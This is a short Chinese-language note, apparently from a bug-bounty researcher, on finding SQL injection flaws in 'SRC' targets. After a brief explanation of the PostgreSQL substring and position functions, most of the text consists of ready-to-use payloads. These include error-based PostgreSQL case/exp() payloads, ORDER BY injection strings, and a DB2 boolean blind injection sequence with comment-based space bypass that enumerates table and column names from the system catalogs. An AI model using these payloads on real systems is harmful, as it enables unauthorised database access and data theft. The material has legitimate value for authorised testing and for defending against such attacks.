SRC中的几个sql注入挖掘过程

substring(user from 1 for 1)代表从第一位开始，截取长度为1

这个函数有两个参数，返回的是第一个参数第一次出现在后面的位置position('sql' in 'postgresql')返回的是8position('sq' in 'postgresql')返回的也是8position('p' in 'postgresql')返回的则是1

'||case position('a' in user) when 1 then 1 else exp(720) end||'

case when length(user)=11 then 1 else exp(800) end

case when ascii(substr(user,1,1))=11 then 1 else exp(900)

case when ascii(substr(user,2,1))=11 then 1 else exp(900)

(case 1 when 1 then 1 else 1 end) asc

(case 1 when 1 then exp(900) else PROVINCE_ID end) asc

(case SUBSTRB(USER,1,1) when 1 then exp(900) else PROVINCE_ID end) asc

(case SUBSTR(USER,1,1) when CHR(50) then exp(900) else PROVINCE_ID end) asc

原始语句，这里/**/代替的是空格，根据实际情况变化即可注用户表数量'/**/and/**/((select/**/count(NAME)/**/from/**/SYSIBM.SYSTABLES/**/where/**/CREATOR=USER)>10)/**/or/**/'6'='7注入第一个表名长度'/**/and/**/(select/**/(LENGTH(NAME))/**/from/**/SYSIBM.SYSTABLES/**/where/**/name/**/not/**/in/**/('COLUMNS')/**/fetch/**/first/**/1/**/row/**/only)=7/**/or/**/'6'='7注入第一个表名    '/**/and/**/ascii((select/**/(substr(NAME,1,1))/**/from/**/SYSIBM.SYSTABLES/**/where/**/name/**/not/**/in/**/('COLUMNS')/**/fetch/**/first/**/1/**/row/**/only))=84/**/or/**/'6'='7注指定表内列名数量'/**/and/**/(select/**/count(COLNAME)/**/from/**/SYSCAT.columns/**/where/**/TABNAME='TS_AUTH(表名)')>2/**/or/**/'6'='7注入指定表内第一列名长度'/**/and/**/(select/**/(LENGTH(COLNAME)) from SYSCAT.columns/**/where/**/TABNAME='TS_AUTH(表名)'/**/and/**/colno=0)=7/**/or/**/'6'='7注入指定表内第一个列名'/**/and/**/ascii((select/**/(substr(COLNAME,1,1))/**/from/**/SYSCAT.columns where TABNAME='TS_AUTH(表名)'/**/and/**/colno=0))=84/**/or/**/'6'='7

ASCII((select(substr(NAME,1,1)) from SYSIBM.SYSTABLES where name not in ('COLUMNS') fetch first 1 row only))=84SYSIBM.SYSTABLES为DB2中的默认表，这条语句返回的就是第一张表名的第一个字符的ascii码